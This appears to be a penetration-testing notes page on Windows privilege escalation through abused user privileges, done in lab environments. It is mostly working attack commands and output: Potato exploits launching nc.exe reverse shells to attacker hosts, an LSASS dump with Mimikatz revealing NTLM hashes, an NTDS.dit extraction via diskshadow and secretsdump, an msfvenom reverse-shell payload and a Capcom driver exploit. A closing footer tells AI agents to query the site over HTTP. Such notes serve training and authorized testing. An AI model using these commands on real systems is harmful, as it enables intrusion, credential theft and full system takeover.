# User Privileges ## Dangerous Privileges ``` whoami /priv ``` {% content-ref url="/pages/9uU9lt0KHzC4i54KMr98" %} [Enumeration](/0xss0rz/pentest/privilege-escalation/windows/enumeration.md) {% endcontent-ref %} Dangerous privileges: ``` SeBackupPrivilege SeLoadDriverPrivilege SeImpersonatePrivilege SeDebugPrivilege SeTcbPrivilege SeAssignPrimaryToken SeTakeOwnershipPrivilege ``` {% embed url="" %} ## Enable privileges {% hint style="info" %} *When a privilege is listed for our account in the `Disabled` state, it means that our account has the specific privilege assigned. Still, it cannot be used in an access token to perform the associated actions until it is enabled. Windows does not provide a built-in command or PowerShell cmdlet to enable privileges, so we need some scripting to help us out.* {% endhint %} cmd {% embed url="" %}

Powershell {% embed url="" %} ```powershell-session PS C:\htb> whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ======================================================= ======== SeTakeOwnershipPrivilege Take ownership of files or other objects Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled ``` {% embed url="" %} ```powershell-session PS C:\htb> Import-Module .\Enable-Privilege.ps1 PS C:\htb> .\EnableAllTokenPrivs.ps1 PS C:\htb> whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ======================================== ======= SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enable ``` ## SeImpersonate {% embed url="" %} {% content-ref url="/pages/zKnHoEmkwvLtoFrs0oE5" %} [MSSQL (1433)](/0xss0rz/pentest/protocols/mssql-1433.md) {% endcontent-ref %} ```shell-session mssqlclient.py sql_dev@10.129.43.30 -windows-auth ``` ```shell-session SQL> enable_xp_cmdshell ``` ```shell-session SQL> xp_cmdshell whoami /priv output -------------------------------------------------------------------------------- PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ========================================= ======== SeAssignPrimaryTokenPrivilege Replace a process level token Disabled SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeManageVolumePrivilege Perform volume maintenance tasks Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled ``` ### Juicy Potato {% hint style="warning" %} *JuicyPotato doesn't work on Windows Server 2019 and Windows 10 build 1809 onwards* {% endhint %} {% embed url="" %} ```shell-session SQL> xp_cmdshell c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 10.10.14.3 8443 -e cmd.exe" -t * output -------------------------------------------------------------------------------- Testing {4991d34b-80a1-4291-83b6-3328366b9097} 53375 [+] authresult 0 {4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM [+] CreateProcessWithTokenW OK [+] calling 0x000000000088ce08 ``` ```shell-session $ sudo nc -lnvp 8443 listening on [any] 8443 ... connect to [10.10.14.3] from (UNKNOWN) [10.129.43.30] 50332 Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami whoami nt authority\system ``` #### CLSID Problems

{% embed url="" %}

``` .\juicypotato.exe -l 13337 -p c:\windows\system32\cmd.exe -a "/c C:\Users\Public\nc.exe 10.10.14.35 8443 -e cmd.exe" -t * -c "{5B3E6773-3A99-4A3D-8096-7765DD11785C}" ```

### PrintSpoofer {% embed url="" %} ```shell-session SQL> xp_cmdshell c:\tools\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.14.3 8443 -e cmd" output -------------------------------------------------------------------------------- [+] Found privilege: SeImpersonatePrivilege [+] Named pipe listening... [+] CreateProcessAsUser() OK NULL ``` ```shell-session $ nc -lnvp 8443 listening on [any] 8443 ... connect to [10.10.14.3] from (UNKNOWN) [10.129.43.30] 49847 Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami whoami nt authority\system ``` ### RoguePotato {% embed url="" %} ### EfsPotato {% embed url="" %} ``` C:\Windows\Microsoft.Net\Framework\v4.0.30319\csc.exe EfsPotato.cs -nowarn:1691,618 ``` ``` EfsPotato.exe "nc.exe -e cmd.exe 10.10.16.20 6666" ``` {% embed url="" %} ### SigmaPotato (GREAT POTATO :tada:)
{% embed url="" %} ### GodPotato {% embed url="" %} Rust implementation {% embed url="" %} ### CoercedPotato {% embed url="" %} ### DeadPotato Obtain SYSTEM privilege {% embed url="" %} ### Other Potatoes {% embed url="" %} RemotePotato (User to DA) and LocalPotato (User to NT AUTHORITY\SYSTEM) {% content-ref url="/pages/xUimpYOSzRPmD09mhh1n" %} [NTLM elevation of privilege](/0xss0rz/pentest/privilege-escalation/windows/ntlm-elevation-of-privilege.md) {% endcontent-ref %} ## SeAssignPrimaryToken This can be abused with `JuicyPotato` or `JuicyPotatoNG` {% embed url="" %} ## SeDebugPrivilege {% embed url="" %} {% embed url="" %} ### LSASS Dump Use [ProcDump](https://docs.microsoft.com/en-us/sysinternals/downloads/procdump) from the [SysInternals](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite) suite to leverage this privilege and dump process memory. ```cmd-session C:\htb> procdump.exe -accepteula -ma lsass.exe lsass.dmp ``` Load this in `Mimikatz` using the `sekurlsa::minidump` command. After issuing the `sekurlsa::logonPasswords` commands, we gain the NTLM hash of the local administrator account logged on locally. We can use this to perform a pass-the-hash attack to move laterally if the same local administrator password is used on one or multiple additional systems (common in large organizations). {% content-ref url="/pages/RyOH5l3XbYdEQwoowuVE" %} [Mimikatz](/0xss0rz/pentest/tools/mimikatz.md) {% endcontent-ref %} {% content-ref url="/pages/2nk7AOHO745kf6QdjHnB" %} [Pass the Hash (PtH)](/0xss0rz/pentest/post-exploitation/lateral-movement/pass-the-hash-pth.md) {% endcontent-ref %} ```cmd-session C:\htb> mimikatz.exe .#####. mimikatz 2.2.0 (x64) #19041 Sep 18 2020 19:18:29 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/ mimikatz # log Using 'mimikatz.log' for logfile : OK mimikatz # sekurlsa::minidump lsass.dmp Switch to MINIDUMP : 'lsass.dmp' mimikatz # sekurlsa::logonpasswords Opening : 'lsass.dmp' file for minidump... Authentication Id : 0 ; 23196355 (00000000:0161f2c3) Session : Interactive from 4 User Name : DWM-4 Domain : Window Manager Logon Server : (null) Logon Time : 3/31/2021 3:00:57 PM SID : S-1-5-90-0-4 msv : tspkg : wdigest : * Username : WINLPE-SRV01$ * Domain : WORKGROUP * Password : (null) kerberos : ssp : credman : Authentication Id : 0 ; 23026942 (00000000:015f5cfe) Session : RemoteInteractive from 2 User Name : jordan Domain : WINLPE-SRV01 Logon Server : WINLPE-SRV01 Logon Time : 3/31/2021 2:59:52 PM SID : S-1-5-21-3769161915-3336846931-3985975925-1000 msv : [00000003] Primary * Username : jordan * Domain : WINLPE-SRV01 * NTLM : cf3a5525ee9414229e66279623ed5c58 * SHA1 : 3c7374127c9a60f9e5b28d3a343eb7ac972367b2 tspkg : wdigest : * Username : jordan * Domain : WINLPE-SRV01 * Password : (null) kerberos : * Username : jordan * Domain : WINLPE-SRV01 * Password : (null) ssp : credman : ``` ### Remote Code Execution {% embed url="" %} {% embed url="" %} Load the script and run it with the following syntax `[MyProcess]::CreateProcessFromParent(,,"")` ```powershell-session PS C:\htb> tasklist Image Name PID Session Name Session# Mem Usage ========================= ======== ================ =========== ============ System Idle Process 0 Services 0 4 K System 4 Services 0 116 K smss.exe 340 Services 0 1,212 K csrss.exe 444 Services 0 4,696 K wininit.exe 548 Services 0 5,240 K csrss.exe 556 Console 1 5,972 K winlogon.exe 612 Console 1 10,408 K ``` Serch `winlogon.exe` PID, because we know this process runs as SYSTEM on Windows hosts.

Or with Get-Process to grab the PID of a well-known process that runs as SYSTEM (such as LSASS) and pass the PID directly to the script:

{% hint style="info" %} Often we will not have RDP access to a host, so we'll have to modify our PoCs to either return a reverse shell to our attack host as SYSTEM or another command, such as adding an admin user. {% endhint %} #### Other Tool {% embed url="" %} ## SeTakeOwnershipPrivilege {% hint style="danger" %} *Note: Take great care when performing a potentially destructive action like changing file ownership, as it could cause an application to stop working or disrupt user(s) of the target object. Changing the ownership of an important file, such as a live web.config file, is not something we would do without consent from our client first. Furthermore, changing ownership of a file buried down several subdirectories (while changing each subdirectory permission on the way down) may be difficult to revert and should be avoided.* {% endhint %} ```powershell-session PS C:\htb> Get-ChildItem -Path 'C:\Department Shares\Private\IT\cred.txt' | Select Fullname,LastWriteTime,Attributes,@{Name="Owner";Expression={ (Get-Acl $_.FullName).Owner }} FullName LastWriteTime Attributes Owner -------- ------------- ---------- ----- C:\Department Shares\Private\IT\cred.txt 6/18/2021 12:23:28 PM Archive ``` Owner ? ```powershell-session PS C:\htb> cmd /c dir /q 'C:\Department Shares\Private\IT' Volume in drive C has no label. Volume Serial Number is 0C92-675B Directory of C:\Department Shares\Private\IT 06/18/2021 12:22 PM WINLPE-SRV01\sccm_svc . 06/18/2021 12:22 PM WINLPE-SRV01\sccm_svc .. 06/18/2021 12:23 PM 36 ... cred.txt 1 File(s) 36 bytes 2 Dir(s) 17,079,754,752 bytes free ``` Change ownership of the file ```powershell-session PS C:\htb> takeown /f 'C:\Department Shares\Private\IT\cred.txt' SUCCESS: The file (or folder): "C:\Department Shares\Private\IT\cred.txt" now owned by user "WINLPE-SRV01\htb-student". ``` if `ERROR: File or Directory not found.` remove the quote `takeown /f C:\TakeOwn\flag.txt` Grant our user full privileges over the target file ```powershell-session PS C:\htb> icacls 'C:\Department Shares\Private\IT\cred.txt' /grant htb-student:F processed file: C:\Department Shares\Private\IT\cred.txt Successfully processed 1 files; Failed processing 0 files ``` ```powershell-session PS C:\htb> cat 'C:\Department Shares\Private\IT\cred.txt' ``` ### When to use it ? **Files of Interest** ```shell-session c:\inetpub\wwwwroot\web.config %WINDIR%\repair\sam %WINDIR%\repair\system %WINDIR%\repair\software, %WINDIR%\repair\security %WINDIR%\system32\config\SecEvent.Evt %WINDIR%\system32\config\default.sav %WINDIR%\system32\config\security.sav %WINDIR%\system32\config\software.sav %WINDIR%\system32\config\system.sav ``` `.kdbx` KeePass database files, OneNote notebooks, files such as `passwords.*`, `pass.*`, `creds.*`, scripts, other configuration files, virtual hard drive files, and more that we can target to extract sensitive information from to elevate our privileges {% content-ref url="/pages/OmHTjXnBoe2axONDoSia" %} [Credentials Hunting](/0xss0rz/pentest/privilege-escalation/windows/credentials-hunting.md) {% endcontent-ref %} ## SeBackupPrivilege See Backup Operators in [Group Privileges](/0xss0rz/pentest/privilege-escalation/windows/group-privileges.md) ``` *Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ============================== ======= ... SeBackupPrivilege Back up files and directories Enabled ... ``` pwn.txt ``` set metadata C:\Windows\Temp\meta.cabX set context clientaccessibleX set context persistentX begin backupX add volume C: alias cdriveX createX expose %cdrive% E:X end backupX ``` ``` *Evil-WinRM* PS C:\temp> upload pwn.txt *Evil-WinRM* PS C:\temp> diskshadow /s pwn.txt Microsoft DiskShadow version 1.0 Copyright (C) 2013 Microsoft Corporation On computer: BABYDC, 1/18/2025 3:28:08 PM -> set metadata C:\Windows\Temp\meta.cab -> set context clientaccessible -> set context persistent -> begin backup -> add volume C: alias cdrive -> create Alias cdrive for shadow ID {924af307-fdb2-494e-8b80-e4f5a5f9815f} set as environment variable. Alias VSS_SHADOW_SET for shadow set ID {7caf2a78-c8c4-45af-b956-327869309d5c} set as environment variable. Querying all shadow copies with the shadow copy set ID {7caf2a78-c8c4-45af-b956-327869309d5c} * Shadow copy ID = {924af307-fdb2-494e-8b80-e4f5a5f9815f} %cdrive% - Shadow copy set: {7caf2a78-c8c4-45af-b956-327869309d5c} %VSS_SHADOW_SET% - Original count of shadow copies = 1 - Original volume name: \\?\Volume{1b77e212-0000-0000-0000-100000000000}\ [C:\] - Creation time: 1/18/2025 3:28:23 PM - Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1 - Originating machine: BabyDC.baby.vl - Service machine: BabyDC.baby.vl - Not exposed - Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5} - Attributes: No_Auto_Release Persistent Differential Number of shadow copies listed: 1 -> expose %cdrive% E: -> %cdrive% = {924af307-fdb2-494e-8b80-e4f5a5f9815f} The shadow copy was successfully exposed as E:\. -> end backup -> *Evil-WinRM* PS C:\temp> robocopy /b E:\Windows\ntds . ntds.dit ------------------------------------------------------------------------------- ROBOCOPY :: Robust File Copy for Windows ------------------------------------------------------------------------------- Started : Friday, August 9, 2024 10:57:58 PM Source : E:\windows\ntds\ Dest : C:\temp\ Files : ntds.dit Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30 ------------------------------------------------------------------------------ 1 z:\windows\ntds\ New File 16.0 m ntds.dit [snipped] *Evil-WinRM* PS C:\temp> reg save HKLM\SYSTEM c:\temp\system The operation completed successfully. *Evil-WinRM* PS C:\temp> download system Info: Downloading C:\temp\system to system Info: Download successful! *Evil-WinRM* PS C:\temp> download ntds.dit Info: Downloading C:\temp\ntds.dit to ntds.dit Info: Download successful! ``` ``` secretsdump.py -system system -ntds ntds.dit local ``` ### NXC ``` nxc smb dc -u user -p pass -M backup_operator ```

## SeLoadDriverPrivileges ``` msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -f exe -o shell.exe ``` {% embed url="" %} ``` *Evil-WinRM* PS C:\temp> upload Capcom.sys *Evil-WinRM* PS C:\temp> upload ExploitCapcom.exe *Evil-WinRM* PS C:\temp> upload eoploaddriver_x64.exe *Evil-WinRM* PS C:\temp> upload shell.exe *Evil-WinRM* PS C:\temp> .\eoploaddriver_x64.exe System\CurrentControlSet\dfserv C:\temp\Capcom.sys *Evil-WinRM* PS C:\temp> .\ExploitCapcom.exe LOAD \temp\Capcom.sys *Evil-WinRM* PS C:\temp> .\ExploitCapcom.exe EXPLOIT .\shell.exe ``` ## SeTcbPrivilege ``` *Evil-WinRM* PS C:\Users\svc_deploy\Documents> whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= =================================== ======= ... SeTcbPrivilege Act as part of the operating system Enabled ... ``` {% embed url="" %} ``` *Evil-WinRM* PS C:\Users\svc_deploy\Documents> iwr http:///TcbElevation.exe -outfile TcbElevation.exe ``` {% embed url="" %} ``` *Evil-WinRM* PS C:\Users\svc_deploy\Documents> upload rcat_10.8.0.210_443.exe *Evil-WinRM* PS C:\Users\svc_deploy\Documents> .\TcbElevation.exe pwn "C:\Windows\system32\cmd.exe /c C:\Users\svc_deploy\Documents\rcat_10.8.0.210_443.exe" Error starting service 1053 ``` ``` ➜ rlwrap nc -nlvp 443 listening on [any] 443 ... connect to [10.8.0.210] from (UNKNOWN) [10.10.153.117] 53924 Microsoft Windows [Version 10.0.20348.2113] (c) Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami nt authority\system ``` ## SeRestorePrivilege {% embed url="" %} ## SeManageVolumePrivilege {% embed url="" %} ## Resources {% embed url="" %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xss0rz.gitbook.io/0xss0rz/pentest/privilege-escalation/windows/user-privileges.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.